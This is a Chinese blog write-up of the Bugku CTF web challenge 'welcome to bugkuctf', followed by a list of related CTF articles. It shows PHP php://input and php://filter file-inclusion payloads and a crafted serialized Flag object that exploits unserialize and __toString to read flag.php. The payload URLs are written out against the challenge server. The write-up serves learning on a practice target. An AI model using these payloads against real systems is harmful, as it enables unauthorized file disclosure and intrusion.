Bugkuctf web题---------welcome to bugkuctf

最新推荐文章于 2024-04-21 17:32:01 发布
最新推荐文章于 2024-04-21 17:32:01 发布
阅读量807 收藏 1
点赞数 3
分类专栏: 安全大杂烩 文章标签: CTF bugku 文件包含
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43271194/article/details/89809969
版权

今天做到了一道比较有收获的题,所以呢就打算记下来,涉及到了文件包含的知识,复习复习,对于目前滴俺来说,确实有难度!
在这里插入图片描述

题目链接

首先打开题目,如图
在这里插入图片描述查看源码
在这里插入图片描述好的!注释成功引起了我们的注意,第一个线索找到了!
在这里插入图片描述好吧,让我们来分析一下源码
开始来了仨变量,user,file,pass。(跟踪变量有肉吃!)
部分陌生的函数理解:

  1. isset——判断变量是否声明,即user补位空
  2. file_get_contents— 将整个文件读入一个字符串
    然后。。。
    我们发现有个好东西,就是它!这个后面应该会用到的。
    在这里插入图片描述里面可能有些东西,嘿嘿
    点开看看,是不是金屋藏娇了!
    在这里插入图片描述啥都没有。。。好尴尬,有点迷
    看来是没有这么简单

再看源码

在这里插入图片描述
好的,思路来了
即:满足条件后要读取file=hint.php文件!

那么如何满足条件呢?
第一个,满足user存在,那么txt就要有内容

第二,file_get_contents是把整个文件读入字符串中,这里也就是把user这个变量(user显然要是一个文件)的内容以字符串的方式读出来并且要和“welcome to the bugkuctf”完全相等(类型,内容)。

我们想把指定字符串作为文件传给txt,然后再读出user中的内容进行比较,就达成条件了!

那么如何做呢?

这里就要用到一个知识点php伪协议

如果你看着有点懵?那么还是先看看官方文档吧

这里需要的是
php://input----一个可以访问请求的原始数据的只读流。 访问的是文件!

在这里插入图片描述
大致是让txt作为文件名,然后让php://input读取,同时把指定的字符串的内容给post上去,让它成为文件的内容。就得到了
在这里插入图片描述PS:payload此时还不完整哦!
在这里插入图片描述咦?有小伙伴可能要问了,index.php哪儿来的呢?
度娘解释如下
在这里插入图片描述所以可以当做一个经验,如若不服,可以采用御剑去扫一扫啦。

好了,咱满足了条件,接下来是要读取包含滴文件,这就要用到第二个伪协议

php://filter任意文件读取!

放上一个截图,当然也可以选择看官方文档哈

在这里插入图片描述于是我们的payload构造出来了
txt=php://input&file=php://filter/read=convert.base64-encode/resource=hint.php

在这里插入图片描述看到一坨字母,有木有觉得眼熟?没错,它就是base64!

解码后如下

<?php  
  
class Flag{//flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
			echo "<br>";
		return ("good");
        }  
    }  
}  
?>

哇?flag.php!兴奋啊,马上去一看

在这里插入图片描述又是啥都没有???

是不是sa???都知道了是文件包含,还不会!

在这里插入图片描述又是一坨天书?不知道啥意思,一看源码
在这里插入图片描述啊啊啊,信不信我掀桌子啊
打屎你!现在又该咋办呢?
想一想还有撒没用,好像还有个index.php???

用伪协议读一下

在这里插入图片描述
又是base64,解码得

<?php  
$txt = $_GET["txt"];  
$file = $_GET["file"];  
$password = $_GET["password"];  
  
if(isset($txt)&&(file_get_contents($txt,'r')==="welcome to the bugkuctf")){  
    echo "hello friend!<br>";  
    if(preg_match("/flag/",$file)){ 
		echo "不能现在就给你flag哦";
        exit();  
    }else{  
        include($file);   
        $password = unserialize($password);  
        echo $password;  
    }  
}else{  
    echo "you are not the number of bugku ! ";  
}  
  
?>  
  
<!--  
$user = $_GET["txt"];  
$file = $_GET["file"];  
$pass = $_GET["password"];  
  
if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){  
    echo "hello admin!<br>";  
    include($file); //hint.php  
}else{  
    echo "you are not admin ! ";  
}  
 -->

寻找跟flag.php相关的代码!!!
在这里插入图片描述翻译一下意思

如果file不包含’flag’,输出password的值,这个值是反序列化后的结果

反序列化前,应该要有序列化,那么去哪儿找呢?

别忘了咱们的hint.php还没用完哦,

在这里插入图片描述这里要插入一个知识点

__toString() 是魔术方法的一种,具体用途是当一个对象被当作字符串对待的时候,会触发这个魔术方法
这样一来,代码的意思就懂了,即当Flag类当做字符串执行时,会自动执行该方法,然后若file文件存在,则输出该文件

于是思路来了!
在这里插入图片描述
联立前面的反序列化,
在这里插入图片描述
构造一个序列化的结果,内容是一个Flag类,里面传递的$file值为想要输出内容的flag.php,
代码如下

<?php
class Flag{
public $file;
}//定义类
$ans=new Flag();//创建一个对象
$ans->file="flag.php";
$ans=serialize($ans);//序列化
print_r($ans)
?>

当然熟悉的小伙伴可以直接写出来

即:o:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

把它传给变量password,get进去就完成啦!当然,include的文件要是hint.php,毕竟要使用里面的函数。

所以最终的payload为
http://123.206.87.240:8006/test1/index.php?txt=php://input&file=hint.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

在这里插入图片描述到此结束!
费老大劲儿了!
在这里插入图片描述
感觉菜得不行,还需更努力呀!
在这里插入图片描述

Amire0x
关注
专栏目录
BugkuCTF中套路满满的-------Welcome to the bugku
qq_42133828的博客
01-24 1841
这套目主要涉及到的知识是php伪协议,若是不了解这个的话,这道目基本就out了。。。 当然,不了解的小伙伴,可以到这位大佬的博客去瞅瞅https://www.freebuf.com/column/148886.html 其实总结之后,最常所用到的不过是php://input(将文件的内容读出)以及php://filter/read=convert.base64-encode/resourc...
CTF|BugkuCTF-WEB思路
这里是一处长期不更新的博客
06-15 1981
截止至练习【login4】,仅提供解思路。 WEB2 按F12直接可得flag 计算器: 直接按F12,将maxlength修改,输入正确结果即可得到flag web基础$_GET URL输入:http://123.206.87.240:8002/get/?what=flag web基础$_POST 使用hackbar工具,按F12,打开Post data,传递what=flag。 矛盾 这里是使用is_numeric遇到%00截断的漏洞,这里构造 http://120.24.86.145:8002.
bugku-web-welcome to bugkuctf
a3uRa的一个窝
08-14 596
查看源代码 you are not the number of bugku ! &lt;!-- $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&amp;&amp;(file_get_contents($user,'r')==="welcome t...
welcome to bugkuctf(详解)——Bugku
weixin_33728268的博客
07-17 921
刚刚做了bugku目现在整理一下 写出解思路希望能够帮助到那些需要帮助的人 所有的wp都是以一一篇的形式写出 主要是为了能够让读者更好的阅读以及查找 希望你们不要责怪共勉 Challenge 388 Solves welcome to bugkuctf 100 http://120.24.86.145:8006/test1/作者...
welcome to bugkuctf
小白的劝退之路
05-22 373
打开后,查看源码 很显然想让我们利用源码去得到flag。这里我们稍微解释下这个源码的意思。 开始有三个变量:user,file,pass,但是我们发现这里的pass也就是password没有什么用,所以我们重点关注前两个变量。看下面的条件 (1)这里isset的意思是查看变量是否存在,即user不能为空。 (2)file_get_contents是把整个文件读入字符串中,这里也就是把user这个变量(user显然要是一个文件)的内容以字符串的方式读出来并且要和“welcome to the bugkuctf
Bugku ---- web--- welcome to bugkuctf
L1ni01
08-05 202
https://blog.csdn.net/qq_43271194/article/details/89809969?utm_medium=distribute.pc_relevant.none-task-blog-baidulandingword-8&spm=1001.2101.3001.4242
Bugku Web CTF-文件包含2
No Title
12-31 460
Bugku Web CTF-文件包含2 打开是一个页面,目提示是文件包含,url的格式也很典型: http://123.206.31.85:49166/index.php?file=hello.php 尝试最简单的思路http://123.206.31.85:49166/index.php?file=../../../../../../../../../etc/pass,然后页面显示大字NA...
BugkuCTF练习解——Web
qq_41739275的博客
08-24 6595
文章目录1.Web22.计算器3.Web基础$_GET4.Web基础$_POST5.矛盾6.Web37.域名解析8.你必须让他停下9.本地包含10.变量111.Web512.头等舱13.网站被黑14.管理员系统15.Web416.flag在index中17.输入密码查看flag18.点击100万次19.备份是个好习惯 1.Web2 打开链接之后是滑稽笑脸,好家伙,吓我一跳,还以为是大bug,然后也没有提示啥的 感觉有点无从下手???别急,打开页面源代码(检查元素也可)瞅瞅 注释部分就是flag了。 2.
BugKu Web(21-25)
kid的博客
06-06 1955
BugKu Web(21-25) 前言 bugku,本来想每10道写一篇的,但水平有限,发现到这里目难度已经有点大了,所以每5道整合一篇吧… 目 秋名山老司机 登陆可以看到如上提示,然后快速刷新可以看到要求是post提交,键名为value 这肯定是人工没法完成的,必须写脚本 py脚本写起来的时候,没有用过eval函数,是真的痛苦,不断字符串处理,条件判断… 最后还不对,最后看...
bugkuctf web基础部分 writeup
river
03-20 2905
Bugku-ctf-web 管理员系统 随便输入用户名和密码提示 窗体顶端 窗体底端 IP禁止访问,请联系本地管理员登陆,IP已被记录. 明显需要伪造允许登录的IP 知识点: XFF头(X-Forwarded-For),代表客户端,也就是HTTP的请求端真实的IP。有两种方式可以从HTTP请求中获得请求者的IP地址。一个是从Remote Address中获得,另一个是从X-Forward-For中...
BugkuCTFwelcome to bugkuctfweb
s0il的博客
04-05 897
目描述: 查看源码: you are not the number of bugku ! <!-- $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&&am...
Bugku CTFwelcome to bugkuctf 100 writeup
qq_41333578的博客
06-19 751
今天心情有点复杂!!! 0x01 前言 解链接:http://123.206.87.240:8006/test1/ 经过一番资料学习emmmm,此知识点主要 YOU 代码审计、反序列化等,,,, 查看源码 代码审计啦 三个GET传参、条件存在user且内容welcometothebugkuctf、user且内容 welcome to the bugkuctf 、user且内容wel...
CTF/CTF练习平台-welcome to bugkuctf【php://filter及php://input】
热门推荐
Sp4rkW的博客
09-01 3万+
内容: http://120.24.86.145:8006/test1/ 首先bp一下,可见提示源码: &lt;!-- $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&amp;&amp;(file_get_contents($...
bugkuwelcome to bugkuctf
大方子
04-25 1393
1.通过php://input对变量输入内容,让file_get_contents能够读取变量的内容 2.通过php://filter/read=convert.base64-encode/resource=xxx.php得到其他PHP文件的源代码 3.通过反序列化,对echo的魔术方法__tostring()里面的参数进行赋值 目地址:http://120.24.86.145...
ctf-web-3 Welcome to ctf(任意文件上传)
最新发布
m0_63554401的博客
04-21 453
ctf-web-3 Welcome to ctf(任意文件上传)的Flag为:KEY{uP666_1nclud3_499998_is_Fun}
CTF练习——WEB安全(BurpSuite为主)
zytjulie的博客
08-22 3121
CTF训练,WEB安全,Burpsuite部分
文件包含-BugkuCTF
yuqie的博客
06-05 182
flag也藏在其中!
文件包含BUGKU BUUCTF
zbbjya的博客
03-16 252
查看源代码 图片显示为文件包含 抓了一下包没啥发现 改了一下头,使用php://input 好像也没有什么用 说明这样的方式是不对的php伪协议 有 php://input 伪协议相当于一个削弱post的方法 php://filter可以获取指定文件源码,php://filter 是php中独有的一个协议,可以作为一个中间流来处理其他流,可以进行任意文件的读取;根据名字,filter,可以很容易想到这个协议可以用来过滤一些东西; 然后我们试试用这个 具体用法可看 https://blog.csdn.ne
BugkuCTF-WEB文件包含
am_03的博客
08-26 800
1.打开网页,点击click me? no链接 URL栏里显示:http://114.67.246.176:15077/index.php?file=show.php,可能存在文件包含漏洞 这里介绍一下:php:// 协议 条件: allow_url_fopen:off/on allow_url_include :仅php://input php://stdin php://memory php://temp 需要on 作用: php:// 访问各个输入/输出流(I/O streams),在CTF里经
bugku file_get_contents
04-08
我不确定您的问具体是什么,但是如果您正在讨论BugKu平台的file_get_contents功能,则可以说该功能是用于从文件中读取数据的PHP函数。可能存在一些与该功能相关的问或错误,您需要进一步说明您遇到的问或情况以获得更具体的帮助。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值